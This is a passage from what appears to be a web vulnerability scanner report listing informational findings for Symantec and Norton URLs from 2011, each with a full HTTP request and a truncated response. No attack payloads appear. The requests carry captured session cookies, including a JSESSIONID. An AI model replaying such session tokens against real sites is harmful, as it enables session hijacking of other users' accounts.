User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

r

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Fri, 09 Sep 2011 21:26:11 GMT
Content-Length: 2
Connection: close
Expires: Fri, 09 Sep 2011 21:26:10 GMT
Cache-Control: no-cache

OK

24.6. https://renewals.symantec.com/renewals/js/InstantInvite3.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/InstantInvite3.js

Request

GET /renewals/js/InstantInvite3.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 34318
Last-Modified: Thu, 18 Mar 2010 01:42:34 GMT
Accept-Ranges: bytes

/* Copyright (C) InstantService, Inc. All rights reserved.
* All content is protected under U.S. copyright laws. Any unauthorized duplication, modification,
* or reverse-engineering of this code with
...[SNIP]...

24.7. https://renewals.symantec.com/renewals/js/commonFunctions.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/commonFunctions.js

Request

GET /renewals/js/commonFunctions.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 5510
Last-Modified: Thu, 18 Mar 2010 01:42:34 GMT
Accept-Ranges: bytes

// $Id: commonFunctions.js 82 2008-01-30 00:07:20Z mhallesy $
///////////////////////////////////////////
//commonFunctions.js
//maintained by stuller
//last updated 1/18/2006
//see Confluence fo
...[SNIP]...

24.8. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/commonValidation2-9-06.js

Request

GET /renewals/js/commonValidation2-9-06.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 32366
Last-Modified: Thu, 18 Mar 2010 01:42:32 GMT
Accept-Ranges: bytes

// $Id: commonValidation2-9-06.js 82 2008-01-30 00:07:20Z mhallesy $
//please do not make changes to this file!
//if you need to modify it, please make a copy, since this script is used by multipl
...[SNIP]...

24.9. https://renewals.symantec.com/renewals/js/dhtmlwindow.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/dhtmlwindow.js

Request

GET /renewals/js/dhtmlwindow.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:34 GMT
Content-Length: 19028
Last-Modified: Wed, 02 Jun 2010 23:07:30 GMT
Accept-Ranges: bytes

// -------------------------------------------------------------------
// DHTML Window Widget- By Dynamic Drive, available at: http://www.dynamicdrive.com
// v1.0: Script created Feb 15th, 07'
// v
...[SNIP]...

24.10. https://renewals.symantec.com/renewals/js/getPageNames.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/getPageNames.js

Request

GET /renewals/js/getPageNames.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 3087
Last-Modified: Wed, 12 May 2010 17:24:52 GMT
Accept-Ranges: bytes

// $Id: getPageNames.js 1694 2009-04-09 01:56:00Z mhallesy $

function pageNamesLookup(chanName) {
   this.stSrch = "/renewals/";
   this.nameLookup = new Array();

   this.nameLookup["chat_form.jsp"]
...[SNIP]...

24.11. https://renewals.symantec.com/renewals/js/modal.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/modal.js

Request

GET /renewals/js/modal.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:35 GMT
Content-Length: 3362
Last-Modified: Thu, 20 May 2010 22:54:24 GMT
Accept-Ranges: bytes

// -------------------------------------------------------------------
// DHTML Modal window- By Dynamic Drive, available at: http://www.dynamicdrive.com
// v1.0: Script created Feb 27th, 07'
// v1
...[SNIP]...

24.12. https://renewals.symantec.com/renewals/js/mySymantecDevKit.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/mySymantecDevKit.js

Request

GET /renewals/js/mySymantecDevKit.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:37 GMT
Content-Length: 10076
Last-Modified: Mon, 13 Sep 2010 21:57:06 GMT
Accept-Ranges: bytes

function showHelp(thisitem){var divname="help"+thisitem;var thediv=document.getElementById(divname);thediv.style.visibility='visible';}
function hideHelp(thisitem){var divname="help"+thisitem;var the
...[SNIP]...

24.13. https://renewals.symantec.com/renewals/js/s_2_code_symc_cust_prod.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/s_2_code_symc_cust_prod.js

Request

GET /renewals/js/s_2_code_symc_cust_prod.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 28910
Last-Modified: Wed, 28 Apr 2010 02:37:02 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES *************
...[SNIP]...

24.14. https://renewals.symantec.com/renewals/js/symantec_omniture/mysymc_code_util.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/symantec_omniture/mysymc_code_util.js

Request

GET /renewals/js/symantec_omniture/mysymc_code_util.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 8321
Last-Modified: Thu, 18 Mar 2010 01:42:32 GMT
Accept-Ranges: bytes


var countryDetails=new Array();var language=new Array();var RegionArray=new Array();var questionSet="";var pageNumber=0;var samChannel=null;var jsChannel=null;var tabNames=new Array();var subTabName
...[SNIP]...

24.15. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/symantec_omniture/s_code_20100217.js

Request

GET /renewals/js/symantec_omniture/s_code_20100217.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:37 GMT
Content-Length: 30123
Last-Modified: Wed, 28 Apr 2010 02:37:02 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

/* Rainmaker changes to set the report suite. */
if (location.href.inde
...[SNIP]...

24.16. http://us.norton.com/www-uat.ges.sym

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /www-uat.ges.sym

Request

GET /www-uat.ges.sym HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 22137
Cache-Control: public, max-age=21587
Date: Fri, 09 Sep 2011 21:47:29 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Error: Page Not Found - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Content-Language" content="en-US"/>
...[SNIP]...

24.17. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/close_on.gif/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /content/en/us/enterprise/images/liveperson/invite10/close_on.gif/

Request

GET /content/en/us/enterprise/images/liveperson/invite10/close_on.gif/ HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 22137
Cache-Control: public, max-age=1800
Date: Fri, 09 Sep 2011 21:47:33 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Error: Page Not Found - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Content-Language" content="en-US"/>
...[SNIP]...

24.18. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/

Request

GET /content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/ HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 22137
Cache-Control: public, max-age=1800
Date: Fri, 09 Sep 2011 21:47:33 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Error: Page Not Found - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Content-Language" content="en-US"/>
...[SNIP]...

24.19. http://www.symantec.com/business/verisign/fraud-detection-service

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /business/verisign/fraud-detection-service

Request

GET /business/verisign/fraud-detection-service?tid=gnps HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 22137
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:30:49 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Error: Page Not Found - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Content-Language" content="en-US"/>
...[SNIP]...
